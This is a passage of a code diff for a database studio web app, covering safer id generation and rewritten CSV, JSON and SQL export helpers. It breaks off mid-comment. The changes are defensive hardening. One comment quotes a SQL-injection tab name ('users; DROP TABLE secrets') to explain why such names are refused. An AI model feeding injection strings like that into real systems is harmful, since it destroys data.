-      };
+      const isSuperseded = () => lastRunRef.current.get(targetTabId) !== queryId;
 
       /** Write to the tab this run owns — and only while it still owns it. */
       const commitToTab = (update: (tab: QueryTab) => QueryTab) => {
@@ -363,7 +366,7 @@ export function useQueryExecution({
           const errorCode = error.code as string | undefined;
 
           storage.addToHistory({
-            id: newHistoryId(),
+            id: newLocalId(),
             connectionId: activeConnection.id,
             connectionName: activeConnection.name,
             tabName: tabToExec.name,
@@ -389,7 +392,7 @@ export function useQueryExecution({
         // Only add to history for new queries (not load more)
         if (!isLoadMore) {
           storage.addToHistory({
-            id: newHistoryId(),
+            id: newLocalId(),
             connectionId: activeConnection.id,
             connectionName: activeConnection.name,
             tabName: tabToExec.name,
@@ -622,7 +625,7 @@ export function useQueryExecution({
 
         const result = payload.result;
         storage.addToHistory({
-          id: newHistoryId(),
+          id: newLocalId(),
           connectionId: activeConnection.id,
           connectionName: activeConnection.name,
           tabName: tabToExec.name,
@@ -644,7 +647,7 @@ export function useQueryExecution({
       } catch (error) {
         const errorMessage = error instanceof Error ? error.message : "Unknown error";
         storage.addToHistory({
-          id: newHistoryId(),
+          id: newLocalId(),
           connectionId: activeConnection.id,
           connectionName: activeConnection.name,
           tabName: tabToExec.name,

--- a/src/hooks/use-tab-manager.ts
+++ b/src/hooks/use-tab-manager.ts
@@ -4,6 +4,8 @@ import { useState, useCallback, useEffect, useMemo } from "react";
 import type { DatabaseConnection, TableSchema, QueryTab } from "@/lib/types";
 import type { ProviderMetadata } from "@/hooks/use-provider-metadata";
 import { generateTableQuery, generateSelectQuery } from "@/lib/query-generators";
+import { logger } from "@/lib/logger";
+import { newLocalId } from "@/lib/ids";
 
 const DEFAULT_TAB: QueryTab = {
   id: "default",
@@ -91,7 +93,10 @@ export function useTabManager({ activeConnection, metadata, schema, persistWorks
       setTabs(restoredTabs);
       setActiveTabId(hasActiveTab ? parsed.activeTabId : restoredTabs[0].id);
     } catch (error) {
-      console.error("[useTabManager] Failed to restore workspace tabs:", error);
+      logger.warn("Failed to restore workspace tabs; falling back to a single empty tab", {
+        route: "use-tab-manager",
+        error: error instanceof Error ? error.message : String(error),
+      });
       setTabs([DEFAULT_TAB]);
       setActiveTabId(DEFAULT_TAB.id);
     }
@@ -142,7 +147,7 @@ export function useTabManager({ activeConnection, metadata, schema, persistWorks
   );
 
   const addTab = useCallback(() => {
-    const newId = Math.random().toString(36).substring(7);
+    const newId = newLocalId();
     const queryLanguage = metadata?.capabilities.queryLanguage;
     const queryDialect = metadata?.capabilities.queryDialect;
     setTabs((prev) => [
@@ -182,7 +187,7 @@ export function useTabManager({ activeConnection, metadata, schema, persistWorks
         ? generateTableQuery(tableName, capabilities)
         : `SELECT * FROM ${tableName} LIMIT 50;`;
 
-      const newId = Math.random().toString(36).substring(7);
+      const newId = newLocalId();
       const newTab: QueryTab = {
         id: newId,
         name: tableName,
@@ -220,7 +225,7 @@ export function useTabManager({ activeConnection, metadata, schema, persistWorks
             ? "mongodb"
             : "sql";
 
-      const newId = Math.random().toString(36).substring(7);
+      const newId = newLocalId();
       setTabs((prev) => [
         ...prev,
         {

--- a/src/lib/export/csv.ts
+++ b/src/lib/export/csv.ts
@@ -12,11 +12,17 @@
  * it is data the database held. The difference is only which grammar has to be
  * respected — RFC 4180 here, the engine's literal grammar there.
  *
+ * Fields are separated by `,` and records by a single `\n`. RFC 4180 spells the
+ * record separator `CRLF`; every reader that matters accepts a bare LF, and a field
+ * that CONTAINS either is quoted, which is the part a reader cannot recover from.
+ *
  * NOT done here: neutralising a leading `=`, `+`, `-` or `@`, which a spreadsheet
- * reads as a formula. That is a real hazard and a separate decision, because the
- * fix mutates the user's values on the way out; this file's job is to write the
- * value it was given, exactly and unambiguously.
+ * reads as a formula (`docs/BACKLOG.md` X1). That is a real hazard and a separate
+ * decision, because the fix mutates the user's values on the way out; this file's
+ * job is to write the value it was given, exactly and unambiguously.
  */
+
+import { jsonText } from "./json";
 
 /**
  * The characters RFC 4180 says force a field to be quoted. A field is left bare
@@ -35,8 +41,10 @@ function renderValue(value: unknown): string {
   if (value === null || value === undefined) return "";
   if (value instanceof Date) return value.toISOString();
   // A JSON column, a Postgres array, a Mongo sub-document: `String(...)` answers
-  // `[object Object]` for all of them, which loses the cell entirely.
-  if (typeof value === "object") return JSON.stringify(value);
+  // `[object Object]` for all of them, which loses the cell entirely. Through
+  // `jsonText`, because a bare `JSON.stringify` throws on a bigint or a cycle and
+  // would take the whole export with it.
+  if (typeof value === "object") return jsonText(value);
   return String(value);
 }
 
@@ -78,6 +86,20 @@ export function resolveColumns(
 }
 
 /**
+ * One row's value for `column`.
+ *
+ * `Object.hasOwn` first, because `row[column]` walks the prototype chain: a header
+ * naming a field this row has no own entry for — ordinary in a document store, which
+ * hands back rows that do not share a shape — resolved to an INHERITED member when
+ * the name happened to be one. A column called `constructor` wrote
+ * "function Object() { [native code] }" into every row that lacked the field. Same
+ * guard, and the same reason, as `declaredTypeOf` in `src/components/ResultsGrid.tsx`.
+ */
+export function cellOf(row: Record<string, unknown>, column: string): unknown {
+  return Object.hasOwn(row, column) ? row[column] : undefined;
+}
+
+/**
  * `rows` as CSV text, with a header row.
  *
  * Pass `columns` — a result's own `fields` — wherever they are known: they are what
@@ -89,7 +111,7 @@ export function toCsv(rows: readonly Record<string, unknown>[], columns?: readon
   const header = resolveColumns(rows, columns);
   const lines = [csvRow(header)];
   for (const row of rows) {
-    lines.push(csvRow(header.map((column) => row[column])));
+    lines.push(csvRow(header.map((column) => cellOf(row, column))));
   }
   return lines.join("\n");
 }

--- a/src/lib/export/csv.ts
+++ b/src/lib/export/csv.ts
@@ -1,0 +1,95 @@
+/**
+ * The one CSV writer in the studio.
+ *
+ * Every export used to build its own, and each of the three built it by wrapping
+ * the value in quotes and nothing else: `"${val}"`. A single cell holding a quote,
+ * a comma or a newline — ordinary contents for a `text` column — ended the field
+ * early and shifted every column after it for the rest of the file. The damage is
+ * silent, because the file still opens; it is the columns that are wrong.
+ *
+ * Same threat model as `quoteLiteral` in `src/lib/sql/values.ts` (#290): what
+ * leaves here is read by another tool later, usually unattended, and every byte in
+ * it is data the database held. The difference is only which grammar has to be
+ * respected — RFC 4180 here, the engine's literal grammar there.
+ *
+ * NOT done here: neutralising a leading `=`, `+`, `-` or `@`, which a spreadsheet
+ * reads as a formula. That is a real hazard and a separate decision, because the
+ * fix mutates the user's values on the way out; this file's job is to write the
+ * value it was given, exactly and unambiguously.
+ */
+
+/**
+ * The characters RFC 4180 says force a field to be quoted. A field is left bare
+ * otherwise, so a numeric column stays numeric to a spreadsheet.
+ */
+const NEEDS_QUOTING = /["\r\n,]/;
+
+/**
+ * A value as its CSV text, before quoting.
+ *
+ * Absent is empty, which is how a reader spells NULL. It used to be the literal
+ * text `null`/`undefined`, which reads back as a four- or nine-character string
+ * and is indistinguishable from a column that genuinely holds that word.
+ */
+function renderValue(value: unknown): string {
+  if (value === null || value === undefined) return "";
+  if (value instanceof Date) return value.toISOString();
+  // A JSON column, a Postgres array, a Mongo sub-document: `String(...)` answers
+  // `[object Object]` for all of them, which loses the cell entirely.
+  if (typeof value === "object") return JSON.stringify(value);
+  return String(value);
+}
+
+function csvField(value: unknown): string {
+  const text = renderValue(value);
+  return NEEDS_QUOTING.test(text) ? `"${text.replace(/"/g, '""')}"` : text;
+}
+
+/** One CSV record, escaped field by field. */
+export function csvRow(values: readonly unknown[]): string {
+  return values.map(csvField).join(",");
+}
+
+/**
+ * The columns an export writes: what the caller declared, or — when it has nothing
+ * to declare — every key any row carries, in the order the rows first mention them.
+ *
+ * The union rather than the first row's keys, because a document store hands back
+ * rows that do not share a shape. A field absent from row 1 would otherwise be
+ * dropped from the header and, since rows used to be written from `Object.values`,
+ * would also push every later value of that row one column to the left.
+ */
+export function resolveColumns(
+  rows: readonly Record<string, unknown>[],
+  declared?: readonly string[],
+): readonly string[] {
+  if (declared && declared.length > 0) return declared;
+
+  const columns: string[] = [];
+  const seen = new Set<string>();
+  for (const row of rows) {
+    for (const key of Object.keys(row)) {
+      if (seen.has(key)) continue;
+      seen.add(key);
+      columns.push(key);
+    }
+  }
+  return columns;
+}
+
+/**
+ * `rows` as CSV text, with a header row.
+ *
+ * Pass `columns` — a result's own `fields` — wherever they are known: they are what
+ * the engine declared for this result, and they fix both the order and the set. Each
+ * row is then read BY NAME, so a row whose keys arrive in another order, or which is
+ * missing one, lands in the right columns instead of shifting the rest.
+ */
+export function toCsv(rows: readonly Record<string, unknown>[], columns?: readonly string[]): string {
+  const header = resolveColumns(rows, columns);
+  const lines = [csvRow(header)];
+  for (const row of rows) {
+    lines.push(csvRow(header.map((column) => row[column])));
+  }
+  return lines.join("\n");
+}

--- a/src/lib/export/download.ts
+++ b/src/lib/export/download.ts
@@ -1,0 +1,40 @@
+/**
+ * The one "save this to the user's disk" path in the studio.
+ *
+ * Seven exports had grown their own copy of the same six lines, and every copy
+ * carried the same two problems:
+ *
+ * 1. The anchor was never put in the document. A detached `<a download>` is honoured
+ *    by Chromium but ignored by Firefox, so those exports simply did nothing there.
+ * 2. `URL.revokeObjectURL` was called on the line after `click()`. The click only
+ *    STARTS the download; revoking the URL in the same task can pull the blob out
+ *    from under a read that has not begun yet, which is why the failure shows up on
+ *    large results and never on the small one a developer tries.
+ *
+ * Both are fixed once, here.
+ */
+
+/** How long the object URL is kept alive after the click that consumes it. */
+const REVOKE_DELAY_MS = 0;
+
+/** Hand `blob` to the browser as a download named `fileName`. */
+export function downloadBlob(blob: Blob, fileName: string): void {
+  const url = URL.createObjectURL(blob);
+  const link = document.createElement("a");
+  link.href = url;
+  link.download = fileName;
+  // The anchor has to be IN the document for Firefox to honour the click, and it
+  // must not be visible while it is: one frame of a stray link at the end of the
+  // body is enough to shift a layout.
+  link.style.display = "none";
+  document.body.appendChild(link);
+  link.click();
+  link.remove();
+  // A later task, so the download has been handed off before the blob is dropped.
+  setTimeout(() => URL.revokeObjectURL(url), REVOKE_DELAY_MS);
+}
+
+/** Hand `content` to the browser as a `mimeType` download named `fileName`. */
+export function downloadText(content: string, mimeType: string, fileName: string): void {
+  downloadBlob(new Blob([content], { type: mimeType }), fileName);
+}

--- a/src/lib/export/download.ts
+++ b/src/lib/export/download.ts
@@ -34,7 +34,22 @@ export function downloadBlob(blob: Blob, fileName: string): void {
   setTimeout(() => URL.revokeObjectURL(url), REVOKE_DELAY_MS);
 }
 
+/**
+ * The UTF-8 byte order mark, and the one format that needs it.
+ *
+ * Excel decides a CSV's encoding from its first bytes; the charset on the download is
+ * not consulted. Without the mark it reads the file in the host's legacy code page,
+ * and every non-ASCII character in it arrives mangled — which is most exports outside
+ * an English-language database. Every other reader treats the mark as insignificant.
+ *
+ * Only CSV: prepending it to JSON would break a strict parser, and to SQL would put
+ * a stray character in front of the first statement.
+ */
+const BOM = "﻿";
+const NEEDS_BOM = /^text\/csv\b/;
+
 /** Hand `content` to the browser as a `mimeType` download named `fileName`. */
 export function downloadText(content: string, mimeType: string, fileName: string): void {
-  downloadBlob(new Blob([content], { type: mimeType }), fileName);
+  const bytes = NEEDS_BOM.test(mimeType) ? `${BOM}${content}` : content;
+  downloadBlob(new Blob([bytes], { type: mimeType }), fileName);
 }

--- a/src/lib/export/json.ts
+++ b/src/lib/export/json.ts
@@ -1,0 +1,60 @@
+/**
+ * The one JSON serializer the export path uses.
+ *
+ * `JSON.stringify` THROWS on two values an export can genuinely be handed, and it
+ * throws out of the click handler that started the export: no file, no toast, and
+ * nothing in the UI to say why. Both arrive through the embeddable shell
+ * (`src/workspace/StudioWorkspace.tsx`), where the rows are live JavaScript objects
+ * the host passed in rather than a parsed HTTP response:
+ *
+ * 1. A `BigInt` anywhere inside a value — what `mysql2` with `supportBigNumbers`, a
+ *    `bun:sqlite` with safe integers, or a Mongo `Long` can hand back. Written as its
+ *    decimal digits in a string, which is lossless as text; a JSON number would not
+ *    be past 2^53.
+ * 2. A cycle. A document that references itself has no JSON form at all, so the cycle
+ *    is named rather than followed, and every acyclic part of the value survives.
+ *
+ * An export that writes SOMETHING for a value it cannot represent exactly is worth
+ * more than one that writes nothing and reports nothing — and a value this rare is
+ * better labelled in the file than left to a stack trace in the console.
+ */
+
+/** What stands in for a value that contains itself. */
+const CIRCULAR_PLACEHOLDER = "[Circular]";
+
+/**
+ * `value` rebuilt as something `JSON.stringify` cannot throw on.
+ *
+ * `ancestors` is the chain of containers this value sits INSIDE, not every container
+ * already seen: the same object referenced twice under different keys is ordinary in
+ * a result set, and reporting it as a cycle would corrupt the second copy.
+ *
+ * `toJSON` is honoured first and its result walked, which is how `JSON.stringify`
+ * itself treats a `Date` or a BSON value — dropping it would turn a timestamp into
+ * `{}`.
+ */
+function jsonSafe(value: unknown, ancestors: readonly object[]): unknown {
+  if (typeof value === "bigint") return value.toString();
+  if (value === null || typeof value !== "object") return value;
+
+  const custom = (value as { toJSON?: unknown }).toJSON;
+  if (typeof custom === "function") return jsonSafe((custom as () => unknown).call(value), ancestors);
+
+  if (ancestors.includes(value)) return CIRCULAR_PLACEHOLDER;
+  const inside = [...ancestors, value];
+  if (Array.isArray(value)) return value.map((item) => jsonSafe(item, inside));
+
+  const out: Record<string, unknown> = {};
+  for (const [key, item] of Object.entries(value)) out[key] = jsonSafe(item, inside);
+  return out;
+}
+
+/**
+ * `value` as JSON text, for a value that may hold anything.
+ *
+ * `indent` is passed to `JSON.stringify`, so 0 (the default) is the compact form a
+ * CSV cell or a SQL literal wants and 2 is the pretty form the JSON export writes.
+ */
+export function jsonText(value: unknown, indent = 0): string {
+  return JSON.stringify(jsonSafe(value, []), null, indent);
+}

--- a/src/lib/export/result-export.ts
+++ b/src/lib/export/result-export.ts
@@ -1,7 +1,8 @@
 import type { DatabaseType } from "@/lib/types";
 import { isBareIdentifier, quoteIdentifier } from "@/lib/sql/identifier";
 import { quoteLiteral } from "@/lib/sql/values";
-import { resolveColumns, toCsv } from "./csv";
+import { cellOf, resolveColumns, toCsv } from "./csv";
+import { jsonText } from "./json";
 
 /**
  * Turning a result grid into a file the user keeps.
@@ -24,6 +25,12 @@ export interface ResultExportSource {
   tabName: string;
   /** The connected engine, whose literal and identifier grammars the SQL forms use. */
   dialect: DatabaseType | undefined;
+  /**
+   * The type each column was declared with, spelled the way the engine spells it
+   * (`QueryResult.columnTypes`). Absent when the source declared none, which is the
+   * common case — then the DDL form infers a type from a value instead.
+   */
+  columnTypes?: Record<string, string>;
 }
 
 export interface ResultExportFile {
@@ -35,8 +42,20 @@ export interface ResultExportFile {
 /** The table name used when the tab's own name cannot safely be one. */
 export const FALLBACK_TABLE_NAME = "table_name";
 
-/** The prefix `use-tab-manager` puts on a generated tab name. */
-const GENERATED_TAB_PREFIX = /^Query[\s:]*/;
+/**
+ * The prefix `use-tab-manager` puts on a generated tab name — `Query 1`, `Query: users`.
+ *
+ * The separator is REQUIRED (a lookahead, so it is not consumed): stripping a bare
+ * `Query` turned a tab renamed after a real table into a different table, and an
+ * export from a tab named `QueryLog` wrote `INSERT INTO Log`.
+ */
+const GENERATED_TAB_PREFIX = /^Query(?=$|[\s:])[\s:]*/;
+
+/** What a SQL export writes when there is nothing to describe. */
+const NOTHING_TO_EXPORT = {
+  rows: "-- No rows to export.",
+  columns: "-- No columns to export.",
+} as const;
 
 /**
  * The table name the SQL exports write, derived from the tab's title.
@@ -57,25 +76,88 @@ export function deriveTableName(tabName: string): string {
 /** The first value any row carries for `column`, or `undefined` if none does. */
 function firstSample(rows: readonly Record<string, unknown>[], column: string): unknown {
   for (const row of rows) {
-    const value = row[column];
+    const value = cellOf(row, column);
     if (value !== null && value !== undefined) return value;
   }
   return undefined;
 }
 
+/** The kinds of column a value can be inferred to be, before a dialect spells them. */
+type InferredKind = "text" | "integer" | "numeric" | "boolean" | "timestamp";
+
 /**
- * A column's declared type, inferred from a value.
+ * How each dialect spells the inferred kinds.
  *
- * Read from the first row that carries a value rather than from row 0: a column that
- * happens to be NULL in the first row was typed `TEXT` regardless of what the other
- * ten thousand rows hold.
+ * The generic set is not portable, and the statement is meant to be run against the
+ * engine it was read from: Oracle has no `TEXT` and no `BOOLEAN` before 23c, SQL
+ * Server has no `BOOLEAN` at all, and a bare `NUMERIC` on MySQL is `DECIMAL(10,0)` —
+ * which silently truncates every decimal it was chosen for. Only the dialects that
+ * disagree with the standard spelling appear here; the rest fall through to it,
+ * including SQLite, whose column types are advisory affinities anyway.
  */
-function sqlTypeOf(sample: unknown): string {
-  if (typeof sample === "bigint") return "INTEGER";
-  if (typeof sample === "number") return Number.isInteger(sample) ? "INTEGER" : "NUMERIC";
-  if (typeof sample === "boolean") return "BOOLEAN";
-  if (sample instanceof Date) return "TIMESTAMP";
-  return "TEXT";
+const STANDARD_TYPES: Record<InferredKind, string> = {
+  text: "TEXT",
+  integer: "BIGINT",
+  numeric: "DOUBLE PRECISION",
+  boolean: "BOOLEAN",
+  timestamp: "TIMESTAMP",
+};
+
+const DIALECT_TYPES: Partial<Record<DatabaseType, Partial<Record<InferredKind, string>>>> = {
+  mysql: { numeric: "DOUBLE", timestamp: "DATETIME" },
+  oracle: {
+    text: "VARCHAR2(4000)",
+    integer: "NUMBER(19)",
+    numeric: "BINARY_DOUBLE",
+    boolean: "NUMBER(1)",
+  },
+  mssql: {
+    text: "NVARCHAR(MAX)",
+    numeric: "FLOAT",
+    boolean: "BIT",
+    timestamp: "DATETIME2",
+  },
+};
+
+/**
+ * The shape a declared type has to have before it is written into the statement.
+ *
+ * A declared type is engine output — or, through the embeddable shell, whatever the
+ * host put in `columnTypes` — so it is data until it has been checked, in a file whose
+ * whole purpose is to be run somewhere else unattended (#290). Letters, digits,
+ * underscores, spaces, commas and parentheses cover every real spelling
+ * (`Nullable(Int64)`, `DECIMAL(10, 2)`, `TIMESTAMP WITH TIME ZONE`) and exclude every
+ * character that could end the definition list it sits in.
+ */
+const PLAUSIBLE_TYPE = /^[A-Za-z][A-Za-z0-9_(), ]*$/;
+
+/** A column's kind, inferred from a value. */
+function inferKind(sample: unknown): InferredKind {
+  if (typeof sample === "bigint") return "integer";
+  if (typeof sample === "number") return Number.isInteger(sample) ? "integer" : "numeric";
+  if (typeof sample === "boolean") return "boolean";
+  if (sample instanceof Date) return "timestamp";
+  return "text";
+}
+
+/**
+ * A column's declared type for the CREATE TABLE.
+ *
+ * What the engine declared, when it declared anything plausible: that is the type of
+ * THIS result, which is the only source for a computed column or an ad-hoc
+ * projection, and it is already spelled the way the engine spells it.
+ *
+ * Otherwise inferred from the first row that carries a value rather than from row 0:
+ * a column that happens to be NULL in the first row was typed `TEXT` regardless of
+ * what the other ten thousand rows hold.
+ */
+function sqlTypeOf(column: string, rows: readonly Record<string, unknown>[], source: ResultExportSource): string {
+  const declared = source.columnTypes;
+  if (declared !== undefined && Object.hasOwn(declared, column) && PLAUSIBLE_TYPE.test(declared[column])) {
+    return declared[column];
+  }
+  const kind = inferKind(firstSample(rows, column));
+  return DIALECT_TYPES[source.dialect as DatabaseType]?.[kind] ?? STANDARD_TYPES[kind];
 }
 
 /**
@@ -96,7 +178,9 @@ function sqlValue(value: unknown, dialect: DatabaseType | undefined): string {
   if (typeof value === "number") return Number.isFinite(value) ? String(value) : "NULL";
   if (typeof value === "boolean") return String(value);
   if (value instanceof Date) return quoteLiteral(value.toISOString(), dialect);
-  if (typeof value === "object") return quoteLiteral(JSON.stringify(value), dialect);
+  // `jsonText`, not `JSON.stringify`: a bigint or a cycle inside the value would
+  // otherwise throw out of the click handler and produce no file at all.
+  if (typeof value === "object") return quoteLiteral(jsonText(value), dialect);
   return quoteLiteral(String(value), dialect);
 }
 
@@ -106,12 +190,20 @@ export function buildResultExport(format: ResultExportFormat, source: ResultExpo
   const columns = resolveColumns(rows, source.fields);
 
   if (format === "json") {
-    return { content: JSON.stringify(rows, null, 2), mimeType: "application/json", extension: "json" };
+    return { content: jsonText(rows, 2), mimeType: "application/json", extension: "json" };
   }
 
   if (format === "csv") {
-    return { content: toCsv(rows, columns), mimeType: "text/csv", extension: "csv" };
+    // The charset is stated even though the download layer's byte order mark is what
+    // Excel actually reads, because every other consumer reads the type.
+    return { content: toCsv(rows, columns), mimeType: "text/csv;charset=utf-8", extension: "csv" };
   }
+
+  const sql = (content: string): ResultExportFile => ({ content, mimeType: "text/sql", extension: "sql" });
+  // A statement with no column list parses nowhere: `CREATE TABLE t ()` and
+  // `INSERT INTO t () VALUES ()` are both errors, and a 0-byte file says nothing
+  // about why it is empty. A comment is valid SQL in every dialect here.
+  if (columns.length === 0) return sql(NOTHING_TO_EXPORT.columns);
 
   const tableName = deriveTableName(source.tabName);
   // A result field IS a name read from the engine, so quoting it is exactly right —
@@ -120,19 +212,14 @@ export function buildResultExport(format: ResultExportFormat, source: ResultExpo
   const quotedColumns = columns.map((column) => quoteIdentifier(column, dialect));
 
   if (format === "sql-insert") {
+    if (rows.length === 0) return sql(NOTHING_TO_EXPORT.rows);
     const statements = rows.map((row) => {
-      const values = columns.map((column) => sqlValue(row[column], dialect));
+      const values = columns.map((column) => sqlValue(cellOf(row, column), dialect));
       return `INSERT INTO ${tableName} (${quotedColumns.join(", ")}) VALUES (${values.join(", ")});`;
     });
-    return { content: statements.join("\n"), mimeType: "text/sql", extension: "sql" };
+    return sql(statements.join("\n"));
   }
 
-  const definitions = columns.map(
-    (column, index) => `  ${quotedColumns[index]} ${sqlTypeOf(firstSample(rows, column))}`,
-  );
-  return {
-    content: `CREATE TABLE ${tableName} (\n${definitions.join(",\n")}\n);`,
-    mimeType: "text/sql",
-    extension: "sql",
-  };
+  const definitions = columns.map((column, index) => `  ${quotedColumns[index]} ${sqlTypeOf(column, rows, source)}`);
+  return sql(`CREATE TABLE ${tableName} (\n${definitions.join(",\n")}\n);`);
 }

--- a/src/lib/export/result-export.ts
+++ b/src/lib/export/result-export.ts
@@ -1,0 +1,138 @@
+import type { DatabaseType } from "@/lib/types";
+import { isBareIdentifier, quoteIdentifier } from "@/lib/sql/identifier";
+import { quoteLiteral } from "@/lib/sql/values";
+import { resolveColumns, toCsv } from "./csv";
+
+/**
+ * Turning a result grid into a file the user keeps.
+ *
+ * The standalone shell (`src/components/Studio.tsx`) and the embeddable one
+ * (`src/workspace/StudioWorkspace.tsx`) each carried their own copy of this, and the
+ * copies had already drifted — different tab-name regexes, and only one of them
+ * masking. Everything the two genuinely disagree about (which rows, under which
+ * masking) is decided by the caller and arrives here as `rows`.
+ */
+
+export type ResultExportFormat = "csv" | "json" | "sql-insert" | "sql-ddl";
+
+export interface ResultExportSource {
+  /** The rows to write, already masked if the caller masks. */
+  rows: readonly Record<string, unknown>[];
+  /** The columns the engine declared for this result (`QueryResult.fields`). */
+  fields: readonly string[];
+  /** The tab the result is showing in; where the SQL forms get their table name. */
+  tabName: string;
+  /** The connected engine, whose literal and identifier grammars the SQL forms use. */
+  dialect: DatabaseType | undefined;
+}
+
+export interface ResultExportFile {
+  content: string;
+  mimeType: string;
+  extension: string;
+}
+
+/** The table name used when the tab's own name cannot safely be one. */
+export const FALLBACK_TABLE_NAME = "table_name";
+
+/** The prefix `use-tab-manager` puts on a generated tab name. */
+const GENERATED_TAB_PREFIX = /^Query[\s:]*/;
+
+/**
+ * The table name the SQL exports write, derived from the tab's title.
+ *
+ * Interpolated into the statement UNQUOTED, and that is deliberate: this name was
+ * guessed, not read from the engine, so quoting it would pin a case the database
+ * may not use (`src/lib/sql/identifier.ts`). What a guess must not do is carry
+ * statement text, so anything that is not a bare — optionally dotted — identifier is
+ * refused outright rather than escaped. A tab named `users; DROP TABLE secrets`
+ * previously reached the file verbatim, in a file whose whole purpose is to be run
+ * somewhere else, unattended (#290's threat model).
+ */
+export function deriveTableName(tabName: string): string {
+  const candidate = tabName.replace(GENERATED_TAB_PREFIX, "").trim();
+  return isBareIdentifier(candidate) ? candidate : FALLBACK_TABLE_NAME;
+}
+
+/** The first value any row carries for `column`, or `undefined` if none does. */
+function firstSample(rows: readonly Record<string, unknown>[], column: string): unknown {
+  for (const row of rows) {
+    const value = row[column];
+    if (value !== null && value !== undefined) return value;
+  }
+  return undefined;
+}
+
+/**
+ * A column's declared type, inferred from a value.
+ *
+ * Read from the first row that carries a value rather than from row 0: a column that
+ * happens to be NULL in the first row was typed `TEXT` regardless of what the other
+ * ten thousand rows hold.
+ */
+function sqlTypeOf(sample: unknown): string {
+  if (typeof sample === "bigint") return "INTEGER";
+  if (typeof sample === "number") return Number.isInteger(sample) ? "INTEGER" : "NUMERIC";
+  if (typeof sample === "boolean") return "BOOLEAN";
+  if (sample instanceof Date) return "TIMESTAMP";
+  return "TEXT";
+}
+
+/**
+ * A value as SQL.
+ *
+ * Everything that is not a number, a bigint or a boolean is quoted through the
+ * dialect's own literal grammar, which is what keeps a value ending in a backslash
+ * from closing its literal and having the rest of the file read as statements
+ * (#290). The two conversions before that quoting matter as much: a `Date` used to
+ * be stringified to a locale-dependent form no engine parses back, and an object to
+ * the literal text `[object Object]`.
+ */
+function sqlValue(value: unknown, dialect: DatabaseType | undefined): string {
+  if (value === null || value === undefined) return "NULL";
+  if (typeof value === "bigint") return String(value);
+  // NaN and ±Infinity are not numbers any of these dialects accepts as a literal,
+  // and `String(NaN)` would put the bare word `NaN` where a value belongs.
+  if (typeof value === "number") return Number.isFinite(value) ? String(value) : "NULL";
+  if (typeof value === "boolean") return String(value);
+  if (value instanceof Date) return quoteLiteral(value.toISOString(), dialect);
+  if (typeof value === "object") return quoteLiteral(JSON.stringify(value), dialect);
+  return quoteLiteral(String(value), dialect);
+}
+
+/** Build the file for `format`. The caller owns naming it and handing it to the browser. */
+export function buildResultExport(format: ResultExportFormat, source: ResultExportSource): ResultExportFile {
+  const { rows, dialect } = source;
+  const columns = resolveColumns(rows, source.fields);
+
+  if (format === "json") {
+    return { content: JSON.stringify(rows, null, 2), mimeType: "application/json", extension: "json" };
+  }
+
+  if (format === "csv") {
+    return { content: toCsv(rows, columns), mimeType: "text/csv", extension: "csv" };
+  }
+
+  const tableName = deriveTableName(source.tabName);
+  // A result field IS a name read from the engine, so quoting it is exactly right —
+  // and it is the only thing standing between an aliased column (`count(*) AS "n, m"`)
+  // and a statement that no longer parses.
+  const quotedColumns = columns.map((column) => quoteIdentifier(column, dialect));
+
+  if (format === "sql-insert") {
+    const statements = rows.map((row) => {
+      const values = columns.map((column) => sqlValue(row[column], dialect));
+      return `INSERT INTO ${tableName} (${quotedColumns.join(", ")}) VALUES (${values.join(", ")});`;
+    });
+    return { content: statements.join("\n"), mimeType: "text/sql", extension: "sql" };
+  }
+
+  const definitions = columns.map(
+    (column, index) => `  ${quotedColumns[index]} ${sqlTypeOf(firstSample(rows, column))}`,
+  );
+  return {
+    content: `CREATE TABLE ${tableName} (\n${definitions.join(",\n")}\n);`,
+    mimeType: "text/sql",
+    extension: "sql",
+  };
+}

--- a/src/lib/export/scope.ts
+++ b/src/lib/export/scope.ts
@@ -1,0 +1,46 @@
+import type { QueryResult } from "@/lib/types";
+
+/**
+ * How much of the result an export will actually write.
+ *
+ * An export writes the rows the grid HOLDS, and the grid holds one page: statements
+ * are run under a limit (`DEFAULT_QUERY_LIMIT`), and paging fetches more only when
+ * the user asks. So "Export CSV" on a table of two million rows produces five
+ * hundred, and nothing on the way out says so — the same silent wrongness as a
+ * shifted column, and harder to notice, because the file is well formed and the
+ * number in it looks like an answer.
+ *
+ * Saying the count on the button is the cheap half of the fix. The other half — a
+ * server-side export that streams the whole result — is `docs/BACKLOG.md` X2.
+ */
+
+/** Grouped digits, fixed to one locale so the number reads the same everywhere. */
+const GROUPED = new Intl.NumberFormat("en-US");
+
+export interface ExportScope {
+  /** How many rows the file will contain. */
+  rowCount: number;
+  /** That count as it is shown, e.g. `12,480`. */
+  countLabel: string;
+  /** What the file will contain, as a sentence. */
+  summary: string;
+  /** Why it is not everything, or null when it is. */
+  shortfall: string | null;
+}
+
+export function describeExportScope(result: Pick<QueryResult, "rows" | "pagination">): ExportScope {
+  const rowCount = result.rows.length;
+  const countLabel = GROUPED.format(rowCount);
+  const unit = rowCount === 1 ? "row" : "rows";
+  // `hasMore` is the engine's own answer about THIS run: the statement was limited
+  // and the limit was reached. `wasLimited` without `hasMore` means the limit was
+  // applied and the result fit inside it, which is not a shortfall.
+  const truncated = result.pagination?.hasMore === true;
+
+  return {
+    rowCount,
+    countLabel,
+    summary: truncated ? `Writes the ${countLabel} ${unit} loaded here.` : `Writes all ${countLabel} ${unit}.`,
+    shortfall: truncated ? "More rows are still on the server — load them first to include them." : null,
+  };
+}

--- a/src/lib/ids.ts
+++ b/src/lib/ids.ts
@@ -1,0 +1,20 @@
+/**
+ * The id generator for things this browser names for itself — a query-history row, a
+ * saved query, an editor tab, a connection the user typed in.
+ *
+ * `crypto.getRandomValues` rather than `Math.random`, which a scanner reads as a
+ * pseudorandom generator standing where a secure one belongs. Nothing here is a
+ * secret, but the two cost the same and only one of them has to be argued about in
+ * every review. The generator was written once for the history row and the other
+ * three sites kept their own `Math.random().toString(36).substring(7)` — one of them
+ * still on the deprecated `substr` — which is 4–6 characters of entropy standing in
+ * for identity, and identity is what `storage.saveQuery` and the tab list key on.
+ *
+ * Deliberately NOT `crypto.randomUUID`: it is restricted to secure contexts, and
+ * Studio is served over plain HTTP on several of its distribution channels, where it
+ * is simply undefined. `getRandomValues` carries no such restriction.
+ */
+export function newLocalId(): string {
+  const bytes = crypto.getRandomValues(new Uint32Array(2));
+  return `${bytes[0].toString(36)}${bytes[1].toString(36)}`;
+}

--- a/src/lib/lazy.ts
+++ b/src/lib/lazy.ts
@@ -1,0 +1,32 @@
+import { logger } from "@/lib/logger";
+
+/**
+ * Loading a code-split view, once retried.
+ *
+ * Splitting a view out of the first load moves its code from "already here" to "one
